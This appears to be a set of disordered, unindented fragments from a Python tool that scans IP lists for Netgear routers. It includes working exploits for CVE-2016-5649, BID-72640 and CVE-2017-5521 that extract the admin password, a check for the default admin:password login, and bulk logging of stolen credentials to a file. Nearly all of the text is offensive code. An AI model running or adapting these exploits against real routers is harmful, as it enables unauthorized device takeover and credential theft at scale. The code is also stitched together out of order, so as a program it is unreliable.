def cve_2016_5649(router):
exploit = 'CVE-2016-5649'
aux.ex_print('action', '[*] Test for vulnerability ' + exploit + ' --> ',
0)
r = requests.get(router.url + '/BSW_cxttongr.htm')
soup = BeautifulSoup(r.text, 'lxml')
data = []
for table_row in soup.select("tr"):
bdata = table_row.findAll('b')
if len(bdata) > 0:
data.append(bdata)
try:
password = re.search('"(.+?)"', str(data[1])).group(1)
username = '******'
aux.ex_print('positive', ' Vulnerable! ', 1)
aux.ex_print('info', '\tCredentials found: ', 0)
aux.ex_print('positive', username + ':' + password, 1)
router.exploit = exploit
router.username = username
router.password = password
router.vulnerable = True
return 1
except:
aux.ex_print('error', ' NOT vulnerable', 1)
router.exploit = 'NOT VULN'
router.vulnerable = False
return 0
def bid_72640(router):
username = '******'
password = ""
exploit = 'BID-72640'
aux.ex_print('action', '[*] Test for vulnerability ' + exploit + ' --> ',
0)
headers = {
'SOAPAction': 'urn:NETGEAR-ROUTER:service:LANConfigSecurity:1#GetInfo',
'Content-Type': 'application/x-www-form-urlencoded',
'Content - Length': '1'
}
data = 'POST / HTTP/1.1'
r = requests.post(router.url + '/', headers=headers, data=data)
try:
password = re.search('<NewPassword>(.+?)</NewPassword>',
str(r.content)).group(1)
except:
aux.ex_print('error', ' NOT vulnerable', 1)
return 0
else:
aux.ex_print('positive', ' Vulnerable! ', 1)
aux.ex_print('info', '\tCredentials found: ', 0)
aux.ex_print('positive', username + ':' + password, 1)
router.exploit = exploit
router.username = username
router.password = password
router.vulnerable = True
return 1
def exploit_act(router):
model = router.model
if not model in exploits:
aux.ex_print('error', '\t[-] Exploit NOT found for this model', 1)
router.exploit = 'NO EXP'
return 0
else:
try:
a = exploits[model](router)
return a
except:
aux.ex_print('error', '\t[-] NOT vulnerable', 1)
router.exploit = 'NOT VULN'
return 0
def ng_login1(router):
# Test admin:password, passed as a base64 encoded string
headers = {
"User-Agent":
"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0",
"Accept":
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Authorization": "Basic YWRtaW46cGFzc3dvcmQ=",
"DNT": "1",
"Connection": "close",
"Cache-Control": "max-age=0"
}
if requests.get(router.url + '/', headers=headers,
verify=False).status_code == requests.codes.ok:
aux.ex_print('info', '\tDefault credentials in use: ', 0)
aux.ex_print('positive', 'admin:password', 1)
router.default_login = True
router.username = '******'
router.password = '******'
router.vulnerable = True
router.exploit = "Default PWD"
return 1
else:
aux.ex_print('error', '\t[-] Default credentials not in use', 1)
return 0
def __init__(self, opt):
self.ip = opt.ip
self.open_ports = []
aux.ex_print('info', '\nTesting: ' + self.ip, 1)
aux.ex_print('action',
'[*] Try to detect web server on default ports...', 1)
if self.__check_webserver(opt) == 0:
aux.ex_print('error', '\t[-] Brand/Model not found! ', '1')
if args.output_file:
opt.o_file = True
opt.o_file_name = args.output_file
aux.banner(__version__)
if opt.single_ip:
router = classes.Router(opt)
del router
else:
i = 0
with open(opt.list_file, 'r') as ip_list:
for line in ip_list:
i += 1
line = line.replace("\n", "")
opt.ip = line
aux.ex_print("info", "Processing IP number " + str(i) + " of " + str(aux.file_len(opt.list_file)), 1)
router = classes.Router(opt)
router.open_ports = []
# Write to outfile the results even the router is not exploitable
if opt.o_file:
output = open(opt.o_file_name, 'a')
if router.vulnerable:
output.writelines(router.model + ',' + router.ip + ',' + router.port + ',' + str(
router.vulnerable) + ',' + router.exploit + ',' + router.username + ',' + router.password + '\n')
else:
if router.model != '':
output.writelines(
router.model + ',' + router.ip + ',' + router.port + ',' + router.exploit + '\n')
del router
output.close()
ip_list.close()
def cve_2017_5521(router):
token = ''
exploit = 'CVE-2017-5521'
aux.ex_print('action', '[*] Test for vulnerability ' + exploit + ' --> ',
0)
token = re.search('id=(.+?)"', str(router.body)).group(1)
if token != '':
r = requests.post(router.url + '/passwordrecovered.cgi?id=' + token,
verify=False,
timeout=2)
if r.text.find('left\">') != -1:
username = (repr(
scrape(r.text, 'Router Admin Username</td>', '</td>')))
username = scrape(username, '>', '\'')
password = (repr(
scrape(r.text, 'Router Admin Password</td>', '</td>')))
password = scrape(password, '>', '\'')
if username == "i_dont_speak_english":
username = (scrape(r.text[r.text.find('left\">'):-1],
'left\">', '</td>'))
password = (scrape(r.text[r.text.rfind('left\">'):-1],
'left\">', '</td>'))
else:
aux.ex_print('error', 'NOT vulnerable', 1)
router.exploit = 'NOT VULN'
router.vulnerable = False
return 0
# html encoding pops out of nowhere, lets replace that
password = password.replace("#", "#")
password = password.replace("&", "&")
aux.ex_print('positive', ' Vulnerable! ', 1)
aux.ex_print('info', '\tCredentials found: ', 0)
aux.ex_print('positive', username + ':' + password, 1)
router.exploit = exploit
router.username = username
router.password = password
router.vulnerable = True
else:
aux.ex_print('error', 'NOT vulnerable', 1)
router.exploit = 'NOT VULN'
router.vulnerable = False
return 0
# return 1
return 1
def test():
print("debug")
aux.ex_print('positive', '\tExploit!!!!', 1)
return 1
def __check_webserver(self, opt):
for t in self.__default_ports:
if self.__is_open(t) == 1:
self.open_ports.append(t)
if not len(self.open_ports) > 0:
aux.ex_print('error', '\t[-] Web server not found', '1')
return 1
aux.ex_print('positive',
'\t[+] Found open ports: ' + str(self.open_ports), '1')
protocol = ["http://", "https://"]
# Try every combination of port/protocol to find an usable web server
for port in self.open_ports:
for prot in protocol:
try:
url_to_test = prot + self.ip + ':' + port
r = requests.get(url_to_test, verify=False, timeout=3)
except requests.exceptions.RequestException as e:
aux.ex_print('error', 'DEBUG: Error in request', 1)
pass
else:
self.body = BeautifulSoup(r.text, 'lxml')
self.header = r.headers
# we have found a webserver on the open port
aux.ex_print('positive',
'\t[+] Found web server: ' + url_to_test, '1')
self.url = url_to_test
# try to detect if is a netgear, a dlink...
aux.ex_print('action',
'[*] Try to identify brand/model...', 1)
if aux.is_netgear(self.header) != '':
self.netgear = True
self.model = aux.is_netgear(self.header)
self.port = port
aux.ex_print('positive',
'\t[+] Found Brand/Model : ' + self.model,
'1')
aux.ex_print('action', '[*] Check default creds ...',
'1')
if exploit.login_act(self) == 1:
r.close()
return 1
else:
aux.ex_print('action',
'[*] Search for exploit ...', '1')
exploit.exploit_act(self)
r.close()
return 1
elif aux.is_dlink(self.body):
self.dlink = True
self.model = aux.model
r.close()
return 1
r.close()
return 0
